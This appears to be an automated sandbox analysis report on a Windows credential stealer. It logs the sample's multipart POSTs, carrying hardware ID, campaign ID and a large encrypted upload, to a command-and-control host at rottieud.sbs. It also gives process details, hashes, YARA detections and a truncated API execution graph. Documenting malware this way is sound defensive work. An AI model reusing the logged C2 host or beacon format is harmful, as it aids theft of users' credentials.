                                                                          2024-11-10 08:27:27 UTC1236OUTData Raw: 2d 2d 4f 50 44 44 4f 55 45 4c 4e 35 48 44 44 44 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 42 33 35 44 41 41 39 46 35 44 46 42 37 45 36 43 35 42 45 32 42 31 31 46 36 41 37 46 44 41 38 0d 0a 2d 2d 4f 50 44 44 4f 55 45 4c 4e 35 48 44 44 44 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 4f 50 44 44 4f 55 45 4c 4e 35 48 44 44 44 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 65 53 61 78 41 75 2d 2d 77 65 62 65 78 0d 0a 2d 2d 4f 50 44 44 4f
                                                                          Data Ascii: --OPDDOUELN5HDDDXContent-Disposition: form-data; name="hwid"6B35DAA9F5DFB7E6C5BE2B11F6A7FDA8--OPDDOUELN5HDDDXContent-Disposition: form-data; name="pid"1--OPDDOUELN5HDDDXContent-Disposition: form-data; name="lid"eSaxAu--webex--OPDDO
                                                                          2024-11-10 08:27:27 UTC1006INHTTP/1.1 200 OK
                                                                          Date: Sun, 10 Nov 2024 08:27:27 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          Set-Cookie: PHPSESSID=it5lm0598o4699r5l538mdbjpa; expires=Thu, 06-Mar-2025 02:14:06 GMT; Max-Age=9999999; path=/
                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                          Pragma: no-cache
                                                                          cf-cache-status: DYNAMIC
                                                                          vary: accept-encoding
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lke4uNCHa0lXFoihIuA1blelnzeleUC1DUv6FMzqCLSCDZu0whHiQG66ybP5BcNGjO4ywPHztk4errWJo1XY1tGq4Hv0Prjfr%2FQNqBS6f8u0s7D%2BHaPzL%2Fca4aEidjQ%3D"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                          Server: cloudflare
                                                                          CF-RAY: 8e04a9d708906b04-DFW
                                                                          alt-svc: h3=":443"; ma=86400
                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1087&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2827&recv_bytes=2146&delivery_rate=2618444&cwnd=233&unsent_bytes=0&cid=7226882c0414dfad&ts=740&x=0"
                                                                          2024-11-10 08:27:27 UTC23INData Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 32 0d 0a
                                                                          Data Ascii: 11ok 173.254.250.72
                                                                          2024-11-10 08:27:27 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                          Data Ascii: 0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          6192.168.2.462524104.21.73.2114437812C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-11-10 08:27:28 UTC276OUTPOST /api HTTP/1.1
                                                                          Connection: Keep-Alive
                                                                          Content-Type: multipart/form-data; boundary=SYJ2CVSRLDMALM7
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                          Content-Length: 573629
                                                                          Host: rottieud.sbs
                                                                          2024-11-10 08:27:28 UTC15331OUTData Raw: 2d 2d 53 59 4a 32 43 56 53 52 4c 44 4d 41 4c 4d 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 42 33 35 44 41 41 39 46 35 44 46 42 37 45 36 43 35 42 45 32 42 31 31 46 36 41 37 46 44 41 38 0d 0a 2d 2d 53 59 4a 32 43 56 53 52 4c 44 4d 41 4c 4d 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 53 59 4a 32 43 56 53 52 4c 44 4d 41 4c 4d 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 65 53 61 78 41 75 2d 2d 77 65 62 65 78 0d 0a 2d 2d 53 59 4a 32 43
                                                                          Data Ascii: --SYJ2CVSRLDMALM7Content-Disposition: form-data; name="hwid"6B35DAA9F5DFB7E6C5BE2B11F6A7FDA8--SYJ2CVSRLDMALM7Content-Disposition: form-data; name="pid"1--SYJ2CVSRLDMALM7Content-Disposition: form-data; name="lid"eSaxAu--webex--SYJ2C
                                                                          2024-11-10 08:27:28 UTC15331OUTData Raw: d1 7e ce c2 28 c6 d7 d9 c7 e3 4f c3 0f 15 f5 bc ec f2 fd d5 57 ec 3e d3 11 5f 81 01 29 e6 04 c0 b7 c1 b3 98 87 df d8 79 94 6f 36 e2 f0 37 58 9c 71 f9 ff 8c 00 f2 90 0a 3c f2 db 10 dc 0f e2 0c a9 b9 7e 80 99 cb 07 4e c3 01 91 21 38 ee 51 d9 5a 07 bf 99 fd 98 0d c5 90 95 62 5e 94 2f 7d 76 2d e5 77 de 54 cb 08 04 ed e5 db 73 d6 fa 40 6b db 25 ef e7 71 5e cf ab 45 3c 3d 70 84 36 f1 e6 68 8d 06 2e c7 bd 26 59 2d ff f2 0f fc 40 98 24 ba f5 3e 85 b9 c8 9e f9 f2 d7 b6 76 2c a5 3c 4e c1 3c ef 1b ee 8c 66 7a a3 8f 32 e8 7c 42 0f 7c af 5c ab 24 12 c6 36 73 de 5d 1a b4 6a da c9 ef 41 53 4e 86 98 a4 2c 5f 6d 5f fc 5b 0c 47 24 a8 de 44 2c 4c 48 dc d6 8c 1e 35 95 cb ea 0f 43 e4 4d 2e 5f 07 db 9c ef 96 f6 5f e5 ab fb f8 73 40 d2 d2 08 73 e2 b4 f3 ae 27 a9 a8 ff 50 6c 5d
                                                                          Data Ascii: ~(OW>_)yo67Xq<~N!8QZb^/}v-wTs@k%q^E<=p6h.&Y-@$>v,<N<fz2|B|\$6s]jASN,_m_[G$D,LH5CM.__s@s'Pl]
                                                                          2024-11-10 08:27:28 UTC15331OUTData Raw: 4a c9 ad ee aa 2a 77 8f 7e 56 3c 2e a3 e9 b2 69 fc 51 1b 1b 78 b9 b0 3b 38 09 1f ec 25 5a ee f0 95 5e ff d5 ff fa 5b 9b 2a f7 88 9a 9a 42 49 30 54 1c 62 0a 31 66 73 f1 60 db 8e 7f b5 58 6a 5d 04 62 90 fe 3b 72 7d fe 25 48 9a f9 ef 10 eb dc 6c 0d 6f 40 23 21 01 c4 29 f2 ff 35 68 5a aa bf 4f d4 04 22 e0 30 86 77 72 cf ee 3e 20 bd 9f a6 8a c0 f1 f5 eb fb 64 1b 65 92 a1 ea d5 9d 75 fd 72 95 52 60 b1 f1 06 e4 2b fa 2c fd b8 9a 68 fb 47 f4 95 ec fb bc 3d 7f 01 45 30 ae 9e f0 f3 f8 9f b6 82 c8 3a e4 40 8b b7 fe 20 48 c1 65 c6 f8 f4 28 44 0b 47 07 c0 c7 16 54 8a 38 f2 eb ba 1a 9e b8 ab 06 4c c2 6e c2 03 4e 10 11 7c 98 8a 78 4d 2a d0 f2 c8 dd db a0 b3 25 7f 8a 54 3c 5f bb 86 2f 35 49 ef 49 45 8c 94 90 b9 4c 58 09 d8 3b c0 22 26 ee 23 79 73 0a 98 11 48 20 7b f5 78
                                                                          Data Ascii: J*w~V<.iQx;8%Z^[*BI0Tb1fs`Xj]b;r}%Hlo@#!)5hZO"0wr> deurR`+,hG=E0:@ He(DGT8LnN|xM*%T<_/5IIELX;"&#ysH {x
                                                                          2024-11-10 08:27:28 UTC15331OUTData Raw: 77 df a2 5f a2 99 20 10 bd fb 3f 1f bc 97 65 7f ae 6c ff 58 59 f1 b2 26 13 89 43 84 5b e8 db c7 c9 37 72 d3 00 5d 8d 48 a5 a1 c9 fc 28 5e 25 e0 81 c5 ae 1f d3 b0 54 c1 3b e5 98 60 c1 53 28 1c 71 80 6b 78 70 10 e7 51 a2 f2 62 96 fd d0 e4 23 0f ec 3c f9 f6 cd eb 3f 74 dd 2c e7 87 d0 23 9d 17 e7 00 f1 0a 44 54 18 ca 47 01 d7 b6 82 27 4f e0 52 50 af ff df a9 b5 36 17 ac d5 db f7 eb 0d da 76 e1 fa f5 58 e4 9d d9 6a 5f 5e b3 e2 53 6e d5 5e 18 2f de 15 f9 85 e2 2c 51 3f 4b af 86 80 44 1c e4 36 b9 77 dd 8a 27 40 1e 38 7f 9f 23 45 d4 e0 86 e2 4a 51 bb f2 76 e9 61 bf 4b 08 bc 46 d3 3b 05 c8 ba 2c f5 15 21 8b 5a 52 aa 28 4e 04 bc 11 55 b7 04 99 0d 21 ae 80 30 54 30 37 2c 27 36 52 ad f5 8c a1 2f a4 fe 4f c4 8b 43 a4 16 80 59 44 b3 e3 f4 50 3b c1 c1 c5 9f ee e9 e8 f5
                                                                          Data Ascii: w_ ?elXY&C[7r]H(^%T;`S(qkxpQb#<?t,#DTG'ORP6vXj_^Sn^/,Q?KD6w'@8#EJQvaKF;,!ZR(NU!0T07,'6R/OCYDP;
                                                                          2024-11-10 08:27:28 UTC15331OUTData Raw: 74 39 38 16 58 04 dc 89 f4 12 0d 4d 6e 52 66 32 62 1a 59 25 0f 5c e6 cb 2f 3d 90 e0 14 82 fa 47 30 11 df 3c 22 84 32 ae e0 00 0e 81 67 af 04 66 f5 b9 15 81 40 68 23 b4 90 e1 0f 83 fa a1 91 91 81 70 98 df ba 46 2f 3f c3 a2 a9 31 90 6e 4e fb 7d 82 6c 7a f4 78 78 46 84 76 05 57 c5 1b a1 b0 fa 56 c9 9a 6c 15 70 66 52 1e 22 ba f1 2d 0f 20 f1 88 40 e9 5b be 26 fe 1a 86 6d 91 9a 6b 95 3e 37 49 13 cd 07 24 85 27 9c 8c f5 b9 53 98 33 93 17 f7 af e7 0e a9 63 86 03 1f 0d 0e 07 1f 5b 50 ee 2e 62 b4 6a 8b d9 69 4b 35 2f 04 33 ae 1d 27 8b ad bf d6 b4 1d 96 6f 5d 94 b4 af 0f d3 10 6d 2b e7 84 71 53 04 05 46 82 30 20 18 03 63 6c 83 fe 5d 02 f4 91 05 23 31 60 1b 4d ab 3a 57 ec 14 83 09 47 a4 5b 84 e8 7b d9 35 53 3f 09 8d 4b 15 bc ce 79 1b 8f b6 3f 2f c0 5c 15 3e 68 17 aa
                                                                          Data Ascii: t98XMnRf2bY%\/=G0<"2gf@h#pF/?1nN}lzxxFvWVlpfR"- @[&mk>7I$'S3c[P.bjiK5/3'o]m+qSF0 cl]#1`M:WG[{5S?Ky?/\>h
                                                                          2024-11-10 08:27:28 UTC15331OUTData Raw: 2a b9 36 eb 51 2f 2d 02 25 c7 e2 2e 83 ab a3 89 a8 56 d2 c5 d3 93 59 1a 78 68 2e 66 dc 3a b7 2e 82 e7 12 96 c2 d6 ba 40 37 87 90 f0 8c e4 c7 57 e2 7d 91 54 03 04 d6 48 c5 af 5b 86 cc af 2e eb 16 8c 21 25 10 a1 da cf 27 40 0c f7 74 41 26 e9 3c 8c 7c be 0b 07 bb 3c aa 07 cc 54 7c 64 79 bb c9 41 d2 39 c0 7e 3f 5b 9c b5 04 52 db 28 15 6b 81 b3 e0 34 98 72 57 14 03 9a 57 4c a9 3b 60 63 50 2b b3 72 e0 81 f2 dd cd 01 5d 0c 11 55 a1 26 e3 9e d7 8b 30 d9 94 31 d6 ad b2 b3 40 fe 0f 0a 98 93 36 ad 69 23 05 ed bb 8e f0 a0 cd 41 09 95 10 6d c2 d0 1c 07 0c e3 e1 16 24 b0 7c 04 77 89 82 dd 65 cb c2 f4 76 e3 5e 71 50 b6 79 7b 6f 00 0a 68 b0 9f 68 22 2a 0b b5 8a 08 d1 73 3a 25 19 50 df c1 f1 62 55 70 9a e1 fe 61 63 fd b0 e3 e0 46 d3 87 94 c3 e3 ec 47 95 29 2a ca d4 2c 83
                                                                          Data Ascii: *6Q/-%.VYxh.f:.@7W}TH[.!%'@tA&<|<T|dyA9~?[R(k4rWWL;`cP+r]U&01@6i#Am$|wev^qPy{ohh"*s:%PbUpacFG)*,
                                                                          2024-11-10 08:27:28 UTC15331OUTData Raw: 6c d1 a1 b7 d2 c0 37 bd da 12 b6 24 b5 1e 10 e4 78 21 0a 7e 2e 8e 96 83 aa 35 7a 9b 25 15 b7 33 bd 69 b1 45 16 7e 34 e1 02 53 da b0 4d 11 dc 41 49 70 68 ee 21 20 dd 9c 9a b6 7b fa d6 e5 ba e3 8a 32 e5 8d ba 1a a0 9b 27 08 bf f3 18 3d 8d a6 bf dd 18 b5 cc ed ef 1d e3 ff 6e 0b 7d 51 27 5c e7 0c 91 19 59 01 fc f7 cc 0d fb 91 a4 45 7e be 8f 30 7d de 3a 7c 4f c1 10 f7 2f 1c ef b8 2e 60 c7 28 23 7e 42 7c aa 57 90 6d 0b d8 df 65 89 40 a3 23 77 0f 89 9f 71 98 2b cd ea 52 43 d5 50 5a a0 3e 79 70 e8 23 2e e9 a0 97 a1 76 8f 62 9f 63 d9 8e d0 33 b2 a4 be 09 5c 7a 9d 6e e7 57 ce 50 f9 c1 48 a4 e5 18 a6 ea 01 e9 39 eb a7 d5 95 06 d2 34 2e 7f bb c6 f0 08 92 49 a2 b0 c2 3d 10 da 4d 54 08 45 44 81 13 83 62 b7 ee 5a 8c 1f 15 39 24 7e 74 f5 d9 7c 43 a8 02 c9 ab 49 bb c4 84
                                                                          Data Ascii: l7$x!~.5z%3iE~4SMAIph! {2'=n}Q'\YE~0}:|O/.`(#~B|Wme@#wq+RCPZ>yp#.vbc3\znWPH94.I=MTEDbZ9$~t|CI
                                                                          2024-11-10 08:27:28 UTC15331OUTData Raw: 4c 1d 94 82 54 66 98 2b 2e b5 5f d0 d3 57 51 54 b9 af fc 0c 69 83 ec 33 18 8e 91 d1 ed 3f 11 46 af 75 7d 64 b6 93 41 14 00 e5 a5 e3 e5 e5 06 5e 71 00 1f bc a0 5d 1f 2e ed e8 c7 99 ca b8 0c 08 fd 7e c1 e9 6e c6 9f 75 db eb da 8d 8a d7 33 54 b8 32 e7 48 fa 5b f6 96 8b 5a 57 69 dc e0 0f c1 a2 5b ad 5c be 73 6c ed 98 39 24 25 b3 52 65 d3 9e 9d 3e 69 eb 7d 15 e8 d3 d2 8f 66 b4 86 e6 d3 d4 b9 09 c1 bb d2 a7 6c e0 38 f8 6f 4a ff b7 9e c1 9b 86 80 50 00 f5 e0 25 8d 6d 38 c2 c1 ce df d6 c6 3f d0 b3 83 36 5e 17 04 6d 8d 9d e4 54 31 0f ee 20 1f cb ef 62 73 7a 8d 05 62 94 32 07 df cb 01 ad 23 b4 eb 9f d3 72 15 5b 6e 07 68 3f 0e ff 7c c7 f8 96 16 98 2e 89 6a 40 54 7a 9f 38 12 84 89 b2 16 00 b7 50 68 de a5 53 ce 84 49 d1 61 57 29 99 5d 75 f9 5e dd 52 7f 93 3c a5 c6 04
                                                                          Data Ascii: LTf+._WQTi3?Fu}dA^q].~nu3T2H[ZWi[\sl9$%Re>i}fl8oJP%m8?6^mT1 bszb2#r[nh?|.j@Tz8PhSIaW)]u^R<
                                                                          2024-11-10 08:27:28 UTC15331OUTData Raw: 61 9d 5b 4b 46 c0 17 56 b3 00 7e de 52 81 a6 aa 8b 80 d8 67 7d 01 4f 45 94 ba 54 20 34 f6 bc 63 d5 cb e2 0e 1b c2 f5 2d c4 3d 07 b9 63 be a0 5e 9d d1 b7 10 b3 1e 06 d3 e0 d0 0b 8b e1 2a 7d f0 61 d9 96 09 2a 15 3b eb 4f 43 85 e1 20 49 d4 f9 d5 4a 9d 23 61 32 5b a3 81 65 03 dc 1a dd 91 44 42 47 1b e2 52 6f a1 1f df 45 21 90 d4 66 d2 78 7b dd d8 a9 29 30 55 66 4f 31 ca ec 9e 85 f0 86 c4 ea 5e e9 77 05 44 2f 51 61 2d ab be b0 a8 b0 49 dc 3b f3 36 cc 11 37 ad 2b 98 f3 50 ec e2 15 97 08 63 5e 95 7e 37 4b 2f d3 d1 5c 82 3f b7 1f 46 78 4c 27 c7 33 ba eb 37 6b f7 4e f0 1c bb 62 2a 8c 0a a5 ae cf 0c d1 77 c3 4a b3 bc 3a a5 d8 b2 f4 69 37 ed 0c 80 a3 c2 cc d6 bc e1 eb 7a 13 d9 01 f1 9b 56 ba ed d9 0c 29 ce 55 03 ea b5 36 42 57 0f db e3 28 56 57 e1 b2 aa 1e b8 a4 5d
                                                                          Data Ascii: a[KFV~Rg}OET 4c-=c^*}a*;OC IJ#a2[eDBGRoE!fx{)0UfO1^wD/Qa-I;67+Pc^~7K/\?FxL'37kNb*wJ:i7zV)U6BW(VW]
                                                                          2024-11-10 08:27:28 UTC15331OUTData Raw: d7 bb be 91 a8 f5 57 73 eb ed f9 80 8e 68 c1 37 c6 cb 83 23 72 e0 9d 8c 1e 12 3c ed 13 4d 37 0f f9 b1 dd b2 3f d9 e4 ea d6 8f 67 c2 1a e0 e4 ba 9d 3a ff 67 80 e3 6a 25 2c 11 57 c8 0b 74 d6 6e 7b dd ba eb 7c 94 fa 03 89 f6 ab bd f5 2e 49 0e fc 96 3b a5 8b 7b 5e 27 0e e1 b8 2a 01 55 d2 37 3f aa 24 bc c5 10 6d 6b 50 d8 41 e5 dd e8 63 7b 8d 60 47 48 b6 0a 1c ae bf 9e 16 e6 a6 d2 b8 db 84 f7 f4 e8 bb 4e 7c 5e d4 50 cc fc 55 b3 b4 0e f1 5b 44 a1 cf 0e d4 ae e4 d0 81 3b 72 1b f6 d7 d6 3e 8a e0 b9 2f e8 a2 34 8c e1 21 41 25 c5 04 cb 6c c1 d7 47 b5 3e 45 bf d9 64 1f 29 f6 80 b2 9d bc d4 a5 bd a8 14 17 ec dc 78 b1 f0 5d e7 e6 48 5e 16 86 e3 66 26 3d 8d 81 70 73 ae cd d8 f1 b5 b7 35 d1 47 b0 fa ad dc 4e 27 03 c5 b5 da 38 52 15 1f 3e 31 58 43 af 4d 6c 8e 46 18 36 f9
                                                                          Data Ascii: Wsh7#r<M7?g:gj%,Wtn{|.I;{^'*U7?$mkPAc{`GHN|^PU[D;r>/4!A%lG>Ed)x]H^f&=ps5GN'8R>1XCMlF6
                                                                          2024-11-10 08:27:30 UTC1011INHTTP/1.1 200 OK
                                                                          Date: Sun, 10 Nov 2024 08:27:30 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          Set-Cookie: PHPSESSID=avuruod8qcfo7dl04ldsg45rph; expires=Thu, 06-Mar-2025 02:14:09 GMT; Max-Age=9999999; path=/
                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                          Pragma: no-cache
                                                                          cf-cache-status: DYNAMIC
                                                                          vary: accept-encoding
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yjCZe6UF7LgxWFhHIkRQ72lGBCmcldWWZ2xAUJq76GhVtu4LdiaXMQEBG1Kfa0cSrCg2ZSYwlDB789y3oANeHtaw8IBqar4PEXqH6nAOG2vTx%2BH%2FbWS2WvlD0qZg5o8%3D"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                          Server: cloudflare
                                                                          CF-RAY: 8e04a9e27b206b0d-DFW
                                                                          alt-svc: h3=":443"; ma=86400
                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1128&sent=212&recv=611&lost=0&retrans=0&sent_bytes=2827&recv_bytes=576169&delivery_rate=2498705&cwnd=251&unsent_bytes=0&cid=35eaaa6c8e07aa1f&ts=1801&x=0"


                                                                          Click to jump to process

                                                                          Click to jump to process

                                                                          Click to dive into process behavior distribution

                                                                          Click to jump to process

                                                                          Target ID:0
                                                                          Start time:03:26:59
                                                                          Start date:10/11/2024
                                                                          Path:C:\Users\user\Desktop\gFCeeWNTvZ.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Users\user\Desktop\gFCeeWNTvZ.exe"
                                                                          Imagebase:0xa10000
                                                                          File size:48'627'712 bytes
                                                                          MD5 hash:F04F7352CBA3579FF18E50534F6A14D4
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:low
                                                                          Has exited:true

                                                                          Target ID:2
                                                                          Start time:03:27:17
                                                                          Start date:10/11/2024
                                                                          Path:C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
                                                                          Imagebase:0xd50000
                                                                          File size:231'736 bytes
                                                                          MD5 hash:A64BEAB5D4516BECA4C40B25DC0C1CD8
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.1891269625.0000000000B1C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.1934857436.0000000000B21000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.1934926435.0000000000B27000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.1905348168.0000000000B1C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.1891820407.0000000000B1B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                          Reputation:moderate
                                                                          Has exited:true

                                                                          Reset < >

                                                                            Execution Graph

                                                                            Execution Coverage:6.1%
                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                            Signature Coverage:5.7%
                                                                            Total number of Nodes:1698
                                                                            Total number of Limit Nodes:33
                                                                            execution_graph 7138 64606e60 7139 64606e6e 7138->7139 7140 64606e94 7139->7140 7141 64606eac 7139->7141 7142 64602ef4 6 API calls 7140->7142 7147 64606bcb 7141->7147 7144 64606ea8 7142->7144 7145 64606eb8 7145->7144 7146 64606ed6 GetProcAddress 7145->7146 7146->7144 7148 64606be5 LoadLibraryA 7147->7148 7155 64606c19 7147->7155 7149 64606bfc 7148->7149 7150 64606c1e GetProcAddress 7148->7150 7153 64602ef4 6 API calls 7149->7153 7149->7155 7151 64606c44 7150->7151 7152 64606c3a 7150->7152 7151->7152 7156 64606c79 7151->7156 7154 64602ef4 6 API calls 7152->7154 7153->7155 7157 64606c74 7154->7157 7155->7145 7159 64606cc3 calloc 7156->7159 7163 64606c98 7156->7163 7158 64606a9c FreeLibrary 7157->7158 7158->7155 7160 64606ced 7159->7160 7161 64606d01 7160->7161 7162 64606cf4 7160->7162 7168 64602ef4 6 API calls 7161->7168 7165 64606d30 strcmp 7162->7165 7166 64606d58 free 7162->7166 7163->7157 7164 64602ef4 6 API calls 7163->7164 7164->7157 7165->7162 7169 64606d5a strcmp 7165->7169 7166->7155 7170 64606d21 free 7168->7170 7169->7162 7170->7157 7183 64603a64 7184 64603a79 7183->7184 7186 64603a8f 7183->7186 7185 64602ef4 6 API calls 7184->7185 7188 64603a8d 7185->7188 7187 64602ef4 6 API calls 7186->7187 7186->7188 7187->7188 7189 64603e64 7190 64603e78 7189->7190 7191 64603e8e 7189->7191 7192 64602ef4 6 API calls 7190->7192 7193 64603eb5 7191->7193 7194 64603ea1 glfwSetCursor 7191->7194 7196 64603e8c 7191->7196 7192->7196 7197 6460e25c 7193->7197 7194->7191 7198 6460e276 7197->7198 7199 6460e26c DestroyIcon 7197->7199 7198->7196 7199->7198 7209 6460e06e MsgWaitForMultipleObjects 7210 64606070 7211 64606082 7210->7211 7212 64606151 7211->7212 7216 6460616f 7211->7216 7213 64602ef4 6 API calls 7212->7213 7214 6460616d 7213->7214 7216->7214 7217 6460ab26 CreateDCW GetDeviceGammaRamp DeleteDC 7216->7217 7220 646056e7 calloc calloc calloc 7217->7220 7219 6460ab90 7219->7216 7220->7219 7221 64602071 7222 6460ad78 TlsGetValue 7221->7222 7223 64602087 7222->7223 7224 6460209d GetProcAddress 7223->7224 7225 64602091 7223->7225 7224->7225 7226 64611677 7227 64611680 7226->7227 7228 646116a2 7227->7228 7230 64611320 7227->7230 7231 646119d8 7228->7231 7232 64611aa0 _errno 7228->7232 7229 6461137a 7230->7229 7235 64611c20 7230->7235 7234 64611aef 7232->7234 7236 64611c35 7235->7236 7236->7229 7237 64611c82 _errno 7236->7237 7237->7229 7238 64611c76 7239 64611c80 _errno 7238->7239 6327 6460ec78 6328 6460ec8d 6327->6328 6329 6460ecf7 6328->6329 6330 6460ed0d 6328->6330 6426 64602ef4 6329->6426 6332 6460ed17 6330->6332 6334 6460ed3d 6330->6334 6335 64602ef4 6 API calls 6332->6335 6353 64601440 6334->6353 6336 6460ed36 6335->6336 6339 6460edab calloc 6370 6460c519 6339->6370 6342 6460ee9b glfwDestroyWindow 6342->6336 6343 6460eea8 6345 6460eec1 6343->6345 6346 6460eeae 6343->6346 6345->6336 6348 6460eeca 6345->6348 6346->6336 6467 646037ac 6346->6467 6472 6460c46e ShowWindow 6348->6472 6351 6460eed2 6351->6336 6473 6460c4da BringWindowToTop SetForegroundWindow SetFocus 6351->6473 6363 64601453 6353->6363 6354 64601461 6356 64602ef4 6 API calls 6354->6356 6355 64601483 6357 64602ef4 6 API calls 6355->6357 6369 64601559 6356->6369 6360 6460161d 6357->6360 6358 646014f9 6361 64602ef4 6 API calls 6358->6361 6359 646015ce 6359->6355 6359->6360 6360->6336 6360->6339 6361->6369 6362 646014a1 6362->6355 6362->6358 6362->6359 6363->6354 6363->6355 6363->6358 6363->6362 6364 6460150e 6363->6364 6365 6460155e 6364->6365 6368 64601515 6364->6368 6365->6359 6366 64601569 6365->6366 6367 64602ef4 6 API calls 6366->6367 6367->6369 6368->6354 6368->6355 6368->6359 6369->6360 6371 6460c532 6370->6371 6372 6460c545 6371->6372 6373 6460c57b 6371->6373 6484 6460a6a5 EnumDisplaySettingsExW 6372->6484 6488 6460b1d6 6373->6488 6377 6460c56d 6474 64608385 MultiByteToWideChar 6377->6474 6381 6460c5d7 GetModuleHandleW CreateWindowExW free 6382 6460c681 SetPropW 6381->6382 6383 6460c666 6381->6383 6482 646086ab VerSetConditionMask VerSetConditionMask VerSetConditionMask RtlVerifyVersionInfo 6382->6482 6494 64608298 GetLastError FormatMessageW WideCharToMultiByte 6383->6494 6386 6460c6b5 6387 6460c6b9 ChangeWindowMessageFilterEx ChangeWindowMessageFilterEx ChangeWindowMessageFilterEx 6386->6387 6388 6460c737 6386->6388 6387->6388 6389 6460c8ac DragAcceptFiles 6388->6389 6390 6460c790 6388->6390 6497 6460c3c4 MonitorFromWindow 6388->6497 6391 6460c8ce 6389->6391 6392 6460c8d5 6389->6392 6483 6460877d VerSetConditionMask VerSetConditionMask VerSetConditionMask RtlVerifyVersionInfo 6390->6483 6498 6460b89f 6391->6498 6395 6460c8e7 6392->6395 6396 6460c921 6392->6396 6397 6460c946 6392->6397 6398 6460c8f1 6395->6398 6399 6460c67a 6395->6399 6518 6460737c 6396->6518 6401 6460c972 6397->6401 6402 6460c94d 6397->6402 6398->6395 6507 6460c46e ShowWindow 6398->6507 6399->6342 6399->6343 6438 64601b16 6399->6438 6401->6395 6407 6460c97d 6401->6407 6588 646021f7 6402->6588 6406 6460c8f9 6508 6460c4da BringWindowToTop SetForegroundWindow SetFocus 6406->6508 6633 646064fa 6407->6633 6414 6460c802 6417 6460c806 GetDpiForWindow 6414->6417 6418 6460c849 AdjustWindowRectEx 6414->6418 6415 6460c901 6509 6460b0a6 6415->6509 6423 6460c844 6417->6423 6420 6460c868 GetWindowPlacement SetWindowPlacement 6418->6420 6420->6389 6422 6460c908 6517 6460af9b GetMonitorInfoW SetWindowPos 6422->6517 6423->6420 6425 6460c90f 6425->6399 6427 64602f10 6426->6427 6428 6460306c strcpy 6427->6428 6699 6460ad78 6427->6699 6429 64603087 6428->6429 6429->6336 6431 6460301b 6431->6428 6432 64603021 calloc 6431->6432 6702 6460adb6 6432->6702 6434 64603047 6705 6460ae74 6434->6705 6436 64603053 6708 6460aeb2 6436->6708 6439 6460ad78 TlsGetValue 6438->6439 6440 64601b53 glfwMakeContextCurrent 6439->6440 6441 